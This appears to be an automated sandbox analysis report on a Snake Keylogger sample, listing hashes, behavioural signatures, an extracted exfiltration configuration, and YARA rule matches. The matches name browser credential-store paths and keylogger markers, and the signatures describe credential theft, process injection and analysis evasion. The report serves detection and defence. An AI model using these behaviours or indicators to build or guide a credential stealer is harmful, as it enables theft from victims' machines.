Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.24445

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.24445 (renamed file extension from 24445 to exe)
Analysis ID:	608210
MD5:	30bed8890c39e983e2a6b4f4e04edd0b
SHA1:	a293ee3cc2ce151f156127d466b802fdbbdd8f60
SHA256:	77cf402c8513d6df7dfd03896e08c6938fae41bf60d979e9bebf76d833f1b829
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe" MD5: 30BED8890C39E983E2A6B4F4E04EDD0B)

SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe (PID: 6444 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe MD5: 30BED8890C39E983E2A6B4F4E04EDD0B)

cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "l0gs.l@yandex.com", "Telegram ID": "333bukis"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18eae:$x1: $%SMTPDV$ 0x17aee:$x2: $#TheHashHere%& 0x18e56:$x3: %FTPDV$ 0x17ad0:$x4: $%TelegramDv$ 0x1551c:$x5: KeyLoggerEventArgs 0x158ac:$x5: KeyLoggerEventArgs 0x18eda:$m1: \| Snake Keylogger 0x18f80:$m1: \| Snake Keylogger 0x190d4:$m1: \| Snake Keylogger 0x191fa:$m1: \| Snake Keylogger 0x19354:$m1: \| Snake Keylogger 0x18e7a:$m2: Clipboard Logs ID 0x1908a:$m2: Screenshot Logs ID 0x1919e:$m2: keystroke Logs ID 0x1938a:$m3: SnakePW 0x19062:$m4: \SnakeKeylogger\
00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1873e:$x1: $%SMTPDV$ 0x1737e:$x2: $#TheHashHere%& 0x186e6:$x3: %FTPDV$ 0x17360:$x4: $%TelegramDv$ 0x14dac:$x5: KeyLoggerEventArgs 0x1513c:$x5: KeyLoggerEventArgs 0x1876a:$m1: \| Snake Keylogger 0x18810:$m1: \| Snake Keylogger 0x18964:$m1: \| Snake Keylogger 0x18a8a:$m1: \| Snake Keylogger 0x18be4:$m1: \| Snake Keylogger 0x1870a:$m2: Clipboard Logs ID 0x1891a:$m2: Screenshot Logs ID 0x18a2e:$m2: keystroke Logs ID 0x18c1a:$m3: SnakePW 0x188f2:$m4: \SnakeKeylogger\
00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2106e:$x1: $%SMTPDV$ 0x51e8e:$x1: $%SMTPDV$ 0x1fcae:$x2: $#TheHashHere%& 0x50ace:$x2: $#TheHashHere%& 0x21016:$x3: %FTPDV$ 0x51e36:$x3: %FTPDV$ 0x1fc90:$x4: $%TelegramDv$ 0x50ab0:$x4: $%TelegramDv$ 0x1d6dc:$x5: KeyLoggerEventArgs 0x1da6c:$x5: KeyLoggerEventArgs 0x4e4fc:$x5: KeyLoggerEventArgs 0x4e88c:$x5: KeyLoggerEventArgs 0x2109a:$m1: \| Snake Keylogger 0x21140:$m1: \| Snake Keylogger 0x21294:$m1: \| Snake Keylogger 0x213ba:$m1: \| Snake Keylogger 0x21514:$m1: \| Snake Keylogger 0x51eba:$m1: \| Snake Keylogger 0x51f60:$m1: \| Snake Keylogger 0x520b4:$m1: \| Snake Keylogger 0x521da:$m1: \| Snake Keylogger
00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1873e:$x1: $%SMTPDV$ 0x1737e:$x2: $#TheHashHere%& 0x186e6:$x3: %FTPDV$ 0x17360:$x4: $%TelegramDv$ 0x14dac:$x5: KeyLoggerEventArgs 0x1513c:$x5: KeyLoggerEventArgs 0x1876a:$m1: \| Snake Keylogger 0x18810:$m1: \| Snake Keylogger 0x18964:$m1: \| Snake Keylogger 0x18a8a:$m1: \| Snake Keylogger 0x18be4:$m1: \| Snake Keylogger 0x1870a:$m2: Clipboard Logs ID 0x1891a:$m2: Screenshot Logs ID 0x18a2e:$m2: keystroke Logs ID 0x18c1a:$m3: SnakePW 0x188f2:$m4: \SnakeKeylogger\
00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1873e:$x1: $%SMTPDV$ 0x1737e:$x2: $#TheHashHere%& 0x186e6:$x3: %FTPDV$ 0x17360:$x4: $%TelegramDv$ 0x14dac:$x5: KeyLoggerEventArgs 0x1513c:$x5: KeyLoggerEventArgs 0x1876a:$m1: \| Snake Keylogger 0x18810:$m1: \| Snake Keylogger 0x18964:$m1: \| Snake Keylogger 0x18a8a:$m1: \| Snake Keylogger 0x18be4:$m1: \| Snake Keylogger 0x1870a:$m2: Clipboard Logs ID 0x1891a:$m2: Screenshot Logs ID 0x18a2e:$m2: keystroke Logs ID 0x18c1a:$m3: SnakePW 0x188f2:$m4: \SnakeKeylogger\
00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1873e:$x1: $%SMTPDV$ 0x1737e:$x2: $#TheHashHere%& 0x186e6:$x3: %FTPDV$ 0x17360:$x4: $%TelegramDv$ 0x14dac:$x5: KeyLoggerEventArgs 0x1513c:$x5: KeyLoggerEventArgs 0x1876a:$m1: \| Snake Keylogger 0x18810:$m1: \| Snake Keylogger 0x18964:$m1: \| Snake Keylogger 0x18a8a:$m1: \| Snake Keylogger 0x18be4:$m1: \| Snake Keylogger 0x1870a:$m2: Clipboard Logs ID 0x1891a:$m2: Screenshot Logs ID 0x18a2e:$m2: keystroke Logs ID 0x18c1a:$m3: SnakePW 0x188f2:$m4: \SnakeKeylogger\
00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1873e:$x1: $%SMTPDV$ 0x1737e:$x2: $#TheHashHere%& 0x186e6:$x3: %FTPDV$ 0x17360:$x4: $%TelegramDv$ 0x14dac:$x5: KeyLoggerEventArgs 0x1513c:$x5: KeyLoggerEventArgs 0x1876a:$m1: \| Snake Keylogger 0x18810:$m1: \| Snake Keylogger 0x18964:$m1: \| Snake Keylogger 0x18a8a:$m1: \| Snake Keylogger 0x18be4:$m1: \| Snake Keylogger 0x1870a:$m2: Clipboard Logs ID 0x1891a:$m2: Screenshot Logs ID 0x18a2e:$m2: keystroke Logs ID 0x18c1a:$m3: SnakePW 0x188f2:$m4: \SnakeKeylogger\
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xf3338:$x5: KeyLoggerEventArgs 0xf36c8:$x5: KeyLoggerEventArgs 0xf3ca0:$x5: KeyLoggerEventArgs 0xf3ffb:$x5: KeyLoggerEventArgs 0x193cb8:$x5: KeyLoggerEventArgs 0x194048:$x5: KeyLoggerEventArgs 0x194620:$x5: KeyLoggerEventArgs 0x19497b:$x5: KeyLoggerEventArgs 0xf5840:$m1: \| Snake Keylogger 0xf588f:$m1: \| Snake Keylogger 0xf5923:$m1: \| Snake Keylogger 0xf5984:$m1: \| Snake Keylogger 0xf59f9:$m1: \| Snake Keylogger 0x1961c0:$m1: \| Snake Keylogger 0x19620f:$m1: \| Snake Keylogger 0x1962a3:$m1: \| Snake Keylogger 0x196304:$m1: \| Snake Keylogger 0x196379:$m1: \| Snake Keylogger 0xf580f:$m2: Clipboard Logs ID 0xf58fe:$m2: Screenshot Logs ID 0xf5956:$m2: keystroke Logs ID
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x8414:$x5: KeyLoggerEventArgs 0x87a4:$x5: KeyLoggerEventArgs 0x8d7c:$x5: KeyLoggerEventArgs 0x90d7:$x5: KeyLoggerEventArgs 0xa91c:$m1: \| Snake Keylogger 0xa96b:$m1: \| Snake Keylogger 0xa9ff:$m1: \| Snake Keylogger 0xaa60:$m1: \| Snake Keylogger 0xaad5:$m1: \| Snake Keylogger 0xa8eb:$m2: Clipboard Logs ID 0xa9da:$m2: Screenshot Logs ID 0xaa32:$m2: keystroke Logs ID 0xaaf0:$m3: SnakePW 0xa9c6:$m4: \SnakeKeylogger\
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1943e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18627:$a3: \Google\Chrome\User Data\Default\Login Data 0x18a6e:$a4: \Orbitum\User Data\Default\Login Data 0x19bef:$a5: \Kometa\User Data\Default\Login Data
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12b24:$s1: UnHook 0x12b2b:$s2: SetHook 0x12b33:$s3: CallNextHook 0x12b40:$s4: _hook
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16b3e:$x1: $%SMTPDV$ 0x1577e:$x2: $#TheHashHere%& 0x16ae6:$x3: %FTPDV$ 0x15760:$x4: $%TelegramDv$ 0x131ac:$x5: KeyLoggerEventArgs 0x1353c:$x5: KeyLoggerEventArgs 0x16b6a:$m1: \| Snake Keylogger 0x16c10:$m1: \| Snake Keylogger 0x16d64:$m1: \| Snake Keylogger 0x16e8a:$m1: \| Snake Keylogger 0x16fe4:$m1: \| Snake Keylogger 0x16b0a:$m2: Clipboard Logs ID 0x16d1a:$m2: Screenshot Logs ID 0x16e2e:$m2: keystroke Logs ID 0x1701a:$m3: SnakePW 0x16cf2:$m4: \SnakeKeylogger\
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
